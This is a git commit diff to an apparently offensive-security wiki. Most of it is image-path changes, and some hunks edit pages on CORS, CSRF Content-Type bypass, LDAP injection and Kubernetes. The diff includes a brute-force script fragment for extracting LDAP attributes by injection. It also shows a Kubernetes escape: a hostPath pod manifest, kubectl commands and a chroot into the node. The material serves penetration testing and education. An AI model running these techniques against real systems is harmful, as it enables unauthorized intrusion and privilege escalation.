GitBook: [master] 8 pages and 14 assets modified

This commit is contained in:
CPol 2021-05-29 20:00:49 +00:00 committed by gitbook-bot
parent dfca7327db
commit 2f669dffc0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
15 changed files with 24 additions and 22 deletions

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

View file

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 18 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

View file

Before

Width:  |  Height:  |  Size: 2.8 KiB

After

Width:  |  Height:  |  Size: 2.8 KiB

View file

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](../../../.gitbook/assets/image%20%28509%29.png)
![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28512%29.png)

View file

@ -32,7 +32,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
![](../../../.gitbook/assets/image%20%28495%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28495%29%20%281%29%20%281%29.png)
### Volume Shadow Copies
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
### USB Detective

View file

@ -593,7 +593,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

View file

@ -89,9 +89,13 @@ Access-Control-Max-Age: 240
![](../.gitbook/assets/preflight.svg)
Note that in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
Note that usually \(depending on the content-type and headers set\) in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
**Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).**
{% hint style="info" %}
**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) **the conditions of a request to avoid sending of a pre-flight request**
{% endhint %}
## Exploitable misconfigurations
Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.

View file

@ -73,7 +73,13 @@ In this situation, the attacker can again perform a CSRF **attack if the web sit
### Content-Type change
You can change to POST Content-Type to _**application/json, application/x-url-encoded**_ or _**form-multipart**_ and maybe you will be able to bypass the CSRF token.
According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests), n order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values:
* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**
However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
### Referrer / Origin check bypass

View file

@ -16,7 +16,7 @@ LDAP Injection is an attack used to exploit web based applications that construc
**Filterlist** = 1\*filter
**Item**= simple / present / substring
**Simple** = attr filtertype assertionvalue
**Filtertype** = _'=' / '~=' / '>=' / '<='_
**Filtertype** = _'=' / '~=' / '>=' / '<='_
**Present** = attr = \*
**Substring** = attr ”=” \[initial\] \* \[final\]
**Initial** = assertionvalue
@ -128,7 +128,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of ****[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**.**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
```python
#!/usr/bin/python3
@ -156,7 +156,7 @@ for attribute in attributes: #Extract all attributes
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

View file

@ -76,11 +76,13 @@ The following `kubectl` commands indicates just how to list the objects. If you
{% endhint %}
### Using kubectl
when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`.
```bash
alias kubectl='kubectl --token=<jwt_token>'
```
[kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
### Get namespaces
@ -273,12 +275,10 @@ If you are able to create new pods you might be able to escape from them to the
```bash
kubectl get pod <name> [-n <namespace>] -o yaml
```
Then you create your attack.yaml file
```yaml
apiVersion: v1
kind: Pod
@ -300,35 +300,29 @@ spec:
- name: host-fs
mountPath: /root
restartPolicy: Never
```
[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
After that you create the pod
```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```
Now you can switch to the created pod as follows
```bash
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
```
And finally you chroot into the node's system
```bash
chroot /root /bin/bash
```
Information obtained from:\
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)\
[Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## Sniffing

View file

@ -113,5 +113,3 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
##